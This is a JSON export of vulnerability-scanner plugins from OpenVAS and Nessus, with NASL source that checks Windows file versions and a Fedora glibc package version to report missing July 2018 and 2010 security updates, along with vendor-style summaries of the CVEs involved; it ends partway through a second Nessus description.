{"openvas": [{"lastseen": "2019-05-29T18:33:16", "bulletinFamily": "scanner", "description": "This host is missing a critical security\n update according to Microsoft KB4338829", "modified": "2019-05-03T00:00:00", "published": "2018-07-11T00:00:00", "id": "OPENVAS:1361412562310813649", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310813649", "title": "Microsoft Windows Multiple Vulnerabilities (KB4338829)", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Windows Multiple Vulnerabilities (KB4338829)\n#\n# Authors:\n# Rinu Kuriakose <krinu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.813649\");\n script_version(\"2019-05-03T08:55:39+0000\");\n script_cve_id(\"CVE-2018-8282\", \"CVE-2018-8284\", \"CVE-2018-0949\", \"CVE-2018-8125\",\n \"CVE-2018-8202\", \"CVE-2018-8206\", \"CVE-2018-8222\", \"CVE-2018-8242\",\n \"CVE-2018-8280\", \"CVE-2018-8287\", \"CVE-2018-8288\", \"CVE-2018-8290\",\n \"CVE-2018-8291\", \"CVE-2018-8296\", \"CVE-2018-8304\", \"CVE-2018-8307\",\n \"CVE-2018-8308\", \"CVE-2018-8309\", \"CVE-2018-8313\", \"CVE-2018-8314\",\n \"CVE-2018-8356\", \"CVE-2018-3665\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-05-03 08:55:39 +0000 (Fri, 03 May 2019)\");\n script_tag(name:\"creation_date\", value:\"2018-07-11 11:15:15 +0530 (Wed, 11 Jul 2018)\");\n script_name(\"Microsoft Windows Multiple Vulnerabilities (KB4338829)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft KB4338829\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exist due to errors,\n\n - When Windows improperly handles File Transfer Protocol (FTP) connections.\n\n - When Chakra scripting engine improperly handles objects in memory in\n browsers.\n\n - When Windows Kernel API improperly enforces permissions.\n\n - when Windows improperly handles objects in memory.\n\n - When the Windows kernel fails to properly handle objects in memory.\n\n - When Microsoft WordPad improperly handles embedded OLE objects.\n\n - When the scripting engine improperly handles objects in memory in\n Microsoft browsers.\n\n - When Windows fails a check, allowing a sandbox escape.\n\n - A security feature bypass vulnerability exists in Device Guard.\n\n - When Microsoft Internet Explorer improperly handles requests involving\n UNC resources.\n\n - When the Windows kernel-mode driver fails to properly handle objects in memory.\n\n - When Microsoft Edge improperly accesses objects in memory.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n to cause a target system to stop responding, elevate their privilege level,\n run arbitrary code, bypass security, disclose sensitive information and also\n take control of an affected system.\");\n\n script_tag(name:\"affected\", value:\"Windows 10 for 32-bit Systems\n\n Windows 10 for x64-based Systems\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4338829\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win10:1, win10x64:1) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath ){\n exit(0);\n}\n\nedgeVer = fetch_file_version(sysPath:sysPath, file_name:\"edgehtml.dll\");\nif(!edgeVer){\n exit(0);\n}\n\nif(version_in_range(version:edgeVer, test_version:\"11.0.10240.0\", test_version2:\"11.0.10240.17913\"))\n{\n report = report_fixed_ver(file_checked:sysPath + \"\\Edgehtml.dll\",\n file_version:edgeVer, vulnerable_range:\"11.0.10240.0 - 11.0.10240.17913\");\n security_message(data:report);\n exit(0);\n}\nexit(99);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:33:12", "bulletinFamily": "scanner", "description": "This host is missing a critical security\n update according to Microsoft KB4338818", "modified": "2019-05-03T00:00:00", "published": "2018-07-11T00:00:00", "id": "OPENVAS:1361412562310813645", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310813645", "title": "Microsoft Windows Multiple Vulnerabilities (KB4338818)", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Windows Multiple Vulnerabilities (KB4338818)\n#\n# Authors:\n# Rinu Kuriakose <krinu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.813645\");\n script_version(\"2019-05-03T08:55:39+0000\");\n script_cve_id(\"CVE-2018-8282\", \"CVE-2018-0949\", \"CVE-2018-8206\", \"CVE-2018-8242\",\n \"CVE-2018-8287\", \"CVE-2018-8288\", \"CVE-2018-8291\", \"CVE-2018-8296\",\n \"CVE-2018-8304\", \"CVE-2018-8307\", \"CVE-2018-8308\", \"CVE-2018-8309\",\n \"CVE-2018-8314\", \"CVE-2018-3665\");\n script_tag(name:\"cvss_base\", value:\"8.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:S/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-05-03 08:55:39 +0000 (Fri, 03 May 2019)\");\n script_tag(name:\"creation_date\", value:\"2018-07-11 09:15:58 +0530 (Wed, 11 Jul 2018)\");\n script_name(\"Microsoft Windows Multiple Vulnerabilities (KB4338818)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft KB4338818\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaw exists due to errors,\n\n - When Internet Explorer improperly accesses objects in memory.\n\n - When Windows improperly handles File Transfer Protocol (FTP) connections.\n\n - When the scripting engine improperly handles objects in memory in Internet\n Explorer.\n\n - When Windows kernel-mode driver fails to properly handle objects in memory.\n\n - When Windows Domain Name System (DNS) DNSAPI.dll fails to properly handle\n DNS responses.\n\n - When Microsoft WordPad improperly handles embedded OLE objects.\n\n - When Windows fails a check, allowing a sandbox escape.\n\n - Involving side channel speculative execution, known as Lazy FP State Restore.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n to bypass security, cause a target system to stop responding, execute arbitrary\n code in the context of the current user and elevate privileges on an affected\n system.\");\n\n script_tag(name:\"affected\", value:\"Windows 7 for 32-bit/x64 Systems Service Pack 1\n\n Windows Server 2008 R2 for x64-based Systems Service Pack 1\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4338818\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win7:2, win7x64:2, win2008r2:2) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath ){\n exit(0);\n}\n\nfileVer = fetch_file_version(sysPath:sysPath, file_name:\"Kernel32.dll\");\nif(!fileVer){\n exit(0);\n}\n\nif(version_is_less(version:fileVer, test_version:\"6.1.7601.24168\"))\n{\n report = report_fixed_ver(file_checked:sysPath + \"\\Kernel32.dll\",\n file_version:fileVer, vulnerable_range:\"Less than 6.1.7601.24168\");\n security_message(data:report);\n exit(0);\n}\nexit(99);\n", "cvss": {"score": 8.5, "vector": "AV:N/AC:M/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2018-01-08T12:53:29", "bulletinFamily": "scanner", "description": "Check for the Version of glibc", "modified": "2018-01-08T00:00:00", "published": "2010-12-02T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310862646", "id": "OPENVAS:1361412562310862646", "title": "Fedora Update for glibc FEDORA-2010-16308", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for glibc FEDORA-2010-16308\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_affected = \"glibc on Fedora 14\";\ntag_insight = \"The glibc package contains standard libraries which are used by\n multiple programs on the system. In order to save disk space and\n memory, as well as to make upgrading easier, common system code is\n kept in one place and shared between programs. This particular package\n contains the most important sets of shared libraries: the standard C\n library and the standard math library. Without these two libraries, a\n Linux system will not function.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.fedoraproject.org/pipermail/package-announce/2010-October/049665.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.862646\");\n script_version(\"$Revision: 8314 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-08 09:01:01 +0100 (Mon, 08 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2010-12-02 08:39:14 +0100 (Thu, 02 Dec 2010)\");\n script_xref(name: \"FEDORA\", value: \"2010-16308\");\n script_tag(name:\"cvss_base\", value:\"6.9\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:M/Au:N/C:C/I:C/A:C\");\n script_cve_id(\"CVE-2010-3847\");\n script_name(\"Fedora Update for glibc FEDORA-2010-16308\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of glibc\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2010 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC14\")\n{\n\n if ((res = isrpmvuln(pkg:\"glibc\", rpm:\"glibc~2.12.90~17\", rls:\"FC14\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "nessus": [{"lastseen": "2019-11-05T11:37:29", "bulletinFamily": "scanner", "description": "The remote Windows host is missing security update 4338829.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - A remote code execution vulnerability exists in the way\n that the scripting engine handles objects in memory in\n Internet Explorer. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2018-8242, CVE-2018-8296)\n\n - A denial of service vulnerability exists in Windows\n Domain Name System (DNS) DNSAPI.dll when it fails to\n properly handle DNS responses. An attacker who\n successfully exploited the vulnerability could cause a\n system to stop responding. Note that the denial of\n service condition would not allow an attacker to execute\n code or to elevate user privileges. However, the denial\n of service condition could prevent authorized users from\n using system resources. (CVE-2018-8304)\n\n - A denial of service vulnerability exists when Windows\n improperly handles objects in memory. An attacker who\n successfully exploited the vulnerability could cause a\n target system to stop responding. (CVE-2018-8309)\n\n - A remote code execution vulnerability exists in the way\n that the Chakra scripting engine handles objects in\n memory in Microsoft Edge. The vulnerability could\n corrupt memory in such a way that an attacker could\n execute arbitrary code in the context of the current\n user. An attacker who successfully exploited the\n vulnerability could gain the same user rights as the\n current user. (CVE-2018-8280, CVE-2018-8290)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Windows kernel-mode driver fails to\n properly handle objects in memory. An attacker who\n successfully exploited this vulnerability could run\n arbitrary code in kernel mode. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2018-8282)\n\n - A denial of service vulnerability exists when Windows\n improperly handles File Transfer Protocol (FTP)\n connections. An attacker who successfully exploited the\n vulnerability could cause a target system to stop\n responding. (CVE-2018-8206)\n\n - A remote code execution vulnerability exists when\n Microsoft Edge improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that enables an attacker to execute arbitrary code in\n the context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2018-8125)\n\n - A security feature bypass vulnerability exists in Device\n Guard that could allow an attacker to inject malicious\n code into a Windows PowerShell session. An attacker who\n successfully exploited this vulnerability could inject\n code into a trusted PowerShell process to bypass the\n Device Guard Code Integrity policy on the local machine.\n (CVE-2018-8222)\n\n - A security feature bypass vulnerability exists when\n Microsoft Internet Explorer improperly handles requests\n involving UNC resources. An attacker who successfully\n exploited the vulnerability could force the browser to\n load data that would otherwise be restricted.\n (CVE-2018-0949)\n\n - An elevation of privilege vulnerability exists when the\n Windows kernel fails to properly handle objects in\n memory. An attacker who successfully exploited this\n vulnerability could run arbitrary code in kernel mode.\n An attacker could then install programs; view, change,\n or delete data; or create new accounts with full user\n rights. (CVE-2018-8308)\n\n - A security feature bypass vulnerability exists when\n Microsoft WordPad improperly handles embedded OLE\n objects. An attacker who successfully exploited the\n vulnerability could bypass content blocking. In a file-\n sharing attack scenario, an attacker could provide a\n specially crafted document file designed to exploit the\n vulnerability, and then convince a user to open the\n document file. The security update addresses the\n vulnerability by correcting how Microsoft WordPad\n handles input. (CVE-2018-8307)\n\n - An elevation of privilege vulnerability exists in .NET\n Framework which could allow an attacker to elevate their\n privilege level. (CVE-2018-8202)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Kernel API enforces permissions. An\n attacker who successfully exploited the vulnerability\n could impersonate processes, interject cross-process\n communication, or interrupt system functionality.\n (CVE-2018-8313)\n\n - A remote code execution vulnerability exists in the way\n the scripting engine handles objects in memory in\n Microsoft browsers. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2018-8287, CVE-2018-8288, CVE-2018-8291)\n\n - A remote code execution vulnerability exists when the\n Microsoft .NET Framework fails to validate input\n properly. An attacker who successfully exploited this\n vulnerability could take control of an affected system.\n An attacker could then install programs; view, change,\n or delete data; or create new accounts with full user\n rights. Users whose accounts are configured to have\n fewer user rights on the system could be less impacted\n than users who operate with administrative user rights.\n (CVE-2018-8284)\n\n - An elevation of privilege vulnerability exists when\n Windows fails a check, allowing a sandbox escape. An\n attacker who successfully exploited the vulnerability\n could use the sandbox escape to elevate privileges on an\n affected system. This vulnerability by itself does not\n allow arbitrary code execution. However, the\n vulnerability could allow arbitrary code to run if an\n attacker uses it in combination with another\n vulnerability, such as a remote code execution\n vulnerability or another elevation of privilege\n vulnerability, that can leverage the elevated privileges\n when code execution is attempted. The security update\n addresses the vulnerability by correcting how Windows\n file picker handles paths. (CVE-2018-8314)\n\n - A security feature bypass vulnerability exists when\n Microsoft .NET Framework components do not correctly\n validate certificates. An attacker could present expired\n certificates when challenged. The security update\n addresses the vulnerability by ensuring that .NET\n Framework components correctly validate certificates.\n (CVE-2018-8356)", "modified": "2019-11-02T00:00:00", "id": "SMB_NT_MS18_JUL_4338829.NASL", "href": "https://www.tenable.com/plugins/nessus/110986", "published": "2018-07-10T00:00:00", "title": "KB4338829: Windows 10 July 2018 Security Update", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(110986);\n script_version(\"1.7\");\n script_cvs_date(\"Date: 2019/11/04\");\n\n script_cve_id(\n \"CVE-2018-0949\",\n \"CVE-2018-8125\",\n \"CVE-2018-8202\",\n \"CVE-2018-8206\",\n \"CVE-2018-8222\",\n \"CVE-2018-8242\",\n \"CVE-2018-8280\",\n \"CVE-2018-8282\",\n \"CVE-2018-8284\",\n \"CVE-2018-8287\",\n \"CVE-2018-8288\",\n \"CVE-2018-8290\",\n \"CVE-2018-8291\",\n \"CVE-2018-8296\",\n \"CVE-2018-8304\",\n \"CVE-2018-8307\",\n \"CVE-2018-8308\",\n \"CVE-2018-8309\",\n \"CVE-2018-8313\",\n \"CVE-2018-8314\",\n \"CVE-2018-8356\"\n );\n script_bugtraq_id(\n 104617,\n 104620,\n 104622,\n 104623,\n 104629,\n 104631,\n 104634,\n 104635,\n 104636,\n 104637,\n 104638,\n 104642,\n 104644,\n 104648,\n 104652,\n 104664,\n 104665,\n 104667,\n 104668,\n 104669,\n 104670\n );\n script_xref(name:\"MSKB\", value:\"4338829\");\n script_xref(name:\"MSFT\", value:\"MS18-4338829\");\n\n script_name(english:\"KB4338829: Windows 10 July 2018 Security Update\");\n script_summary(english:\"Checks for rollup.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4338829.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - A remote code execution vulnerability exists in the way\n that the scripting engine handles objects in memory in\n Internet Explorer. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2018-8242, CVE-2018-8296)\n\n - A denial of service vulnerability exists in Windows\n Domain Name System (DNS) DNSAPI.dll when it fails to\n properly handle DNS responses. An attacker who\n successfully exploited the vulnerability could cause a\n system to stop responding. Note that the denial of\n service condition would not allow an attacker to execute\n code or to elevate user privileges. However, the denial\n of service condition could prevent authorized users from\n using system resources. (CVE-2018-8304)\n\n - A denial of service vulnerability exists when Windows\n improperly handles objects in memory. An attacker who\n successfully exploited the vulnerability could cause a\n target system to stop responding. (CVE-2018-8309)\n\n - A remote code execution vulnerability exists in the way\n that the Chakra scripting engine handles objects in\n memory in Microsoft Edge. The vulnerability could\n corrupt memory in such a way that an attacker could\n execute arbitrary code in the context of the current\n user. An attacker who successfully exploited the\n vulnerability could gain the same user rights as the\n current user. (CVE-2018-8280, CVE-2018-8290)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Windows kernel-mode driver fails to\n properly handle objects in memory. An attacker who\n successfully exploited this vulnerability could run\n arbitrary code in kernel mode. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2018-8282)\n\n - A denial of service vulnerability exists when Windows\n improperly handles File Transfer Protocol (FTP)\n connections. An attacker who successfully exploited the\n vulnerability could cause a target system to stop\n responding. (CVE-2018-8206)\n\n - A remote code execution vulnerability exists when\n Microsoft Edge improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that enables an attacker to execute arbitrary code in\n the context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2018-8125)\n\n - A security feature bypass vulnerability exists in Device\n Guard that could allow an attacker to inject malicious\n code into a Windows PowerShell session. An attacker who\n successfully exploited this vulnerability could inject\n code into a trusted PowerShell process to bypass the\n Device Guard Code Integrity policy on the local machine.\n (CVE-2018-8222)\n\n - A security feature bypass vulnerability exists when\n Microsoft Internet Explorer improperly handles requests\n involving UNC resources. An attacker who successfully\n exploited the vulnerability could force the browser to\n load data that would otherwise be restricted.\n (CVE-2018-0949)\n\n - An elevation of privilege vulnerability exists when the\n Windows kernel fails to properly handle objects in\n memory. An attacker who successfully exploited this\n vulnerability could run arbitrary code in kernel mode.\n An attacker could then install programs; view, change,\n or delete data; or create new accounts with full user\n rights. (CVE-2018-8308)\n\n - A security feature bypass vulnerability exists when\n Microsoft WordPad improperly handles embedded OLE\n objects. An attacker who successfully exploited the\n vulnerability could bypass content blocking. In a file-\n sharing attack scenario, an attacker could provide a\n specially crafted document file designed to exploit the\n vulnerability, and then convince a user to open the\n document file. The security update addresses the\n vulnerability by correcting how Microsoft WordPad\n handles input. (CVE-2018-8307)\n\n - An elevation of privilege vulnerability exists in .NET\n Framework which could allow an attacker to elevate their\n privilege level. (CVE-2018-8202)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Kernel API enforces permissions. An\n attacker who successfully exploited the vulnerability\n could impersonate processes, interject cross-process\n communication, or interrupt system functionality.\n (CVE-2018-8313)\n\n - A remote code execution vulnerability exists in the way\n the scripting engine handles objects in memory in\n Microsoft browsers. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2018-8287, CVE-2018-8288, CVE-2018-8291)\n\n - A remote code execution vulnerability exists when the\n Microsoft .NET Framework fails to validate input\n properly. An attacker who successfully exploited this\n vulnerability could take control of an affected system.\n An attacker could then install programs; view, change,\n or delete data; or create new accounts with full user\n rights. Users whose accounts are configured to have\n fewer user rights on the system could be less impacted\n than users who operate with administrative user rights.\n (CVE-2018-8284)\n\n - An elevation of privilege vulnerability exists when\n Windows fails a check, allowing a sandbox escape. An\n attacker who successfully exploited the vulnerability\n could use the sandbox escape to elevate privileges on an\n affected system. This vulnerability by itself does not\n allow arbitrary code execution. However, the\n vulnerability could allow arbitrary code to run if an\n attacker uses it in combination with another\n vulnerability, such as a remote code execution\n vulnerability or another elevation of privilege\n vulnerability, that can leverage the elevated privileges\n when code execution is attempted. The security update\n addresses the vulnerability by correcting how Windows\n file picker handles paths. (CVE-2018-8314)\n\n - A security feature bypass vulnerability exists when\n Microsoft .NET Framework components do not correctly\n validate certificates. An attacker could present expired\n certificates when challenged. The security update\n addresses the vulnerability by ensuring that .NET\n Framework components correctly validate certificates.\n (CVE-2018-8356)\");\n # https://support.microsoft.com/en-us/help/4338829/windows-10-update-kb4338829\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?a0a3fc8a\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update KB4338829.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-8284\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/07/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/07/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/07/10\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = \"MS18-07\";\nkbs = make_list('4338829');\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"10\",\n sp:0,\n os_build:\"10240\",\n rollup_date:\"07_2018\",\n bulletin:bulletin,\n rollup_kb_list:[4338829])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-11-05T11:37:28", "bulletinFamily": "scanner", "description": "The remote Windows host is missing security update 4338824\nor cumulative update 4338815. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - An elevation of privilege vulnerability exists in .NET\n Framework which could allow an attacker to elevate their\n privilege level. (CVE-2018-8202)\n\n - A remote code execution vulnerability exists in the way\n that the scripting engine handles objects in memory in\n Internet Explorer. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2018-8242, CVE-2018-8296)\n\n - A denial of service vulnerability exists in Windows\n Domain Name System (DNS) DNSAPI.dll when it fails to\n properly handle DNS responses. An attacker who\n successfully exploited the vulnerability could cause a\n system to stop responding. Note that the denial of\n service condition would not allow an attacker to execute\n code or to elevate user privileges. However, the denial\n of service condition could prevent authorized users from\n using system resources. (CVE-2018-8304)\n\n - A denial of service vulnerability exists when Windows\n improperly handles objects in memory. An attacker who\n successfully exploited the vulnerability could cause a\n target system to stop responding. (CVE-2018-8309)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Windows kernel-mode driver fails to\n properly handle objects in memory. An attacker who\n successfully exploited this vulnerability could run\n arbitrary code in kernel mode. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2018-8282)\n\n - A denial of service vulnerability exists when Windows\n improperly handles File Transfer Protocol (FTP)\n connections. An attacker who successfully exploited the\n vulnerability could cause a target system to stop\n responding. (CVE-2018-8206)\n\n - A security feature bypass vulnerability exists when\n Microsoft Internet Explorer improperly handles requests\n involving UNC resources. An attacker who successfully\n exploited the vulnerability could force the browser to\n load data that would otherwise be restricted.\n (CVE-2018-0949)\n\n - An elevation of privilege vulnerability exists when the\n Windows kernel fails to properly handle objects in\n memory. An attacker who successfully exploited this\n vulnerability could run arbitrary code in kernel mode.\n An attacker could then install programs; view, change,\n or delete data; or create new accounts with full user\n rights. 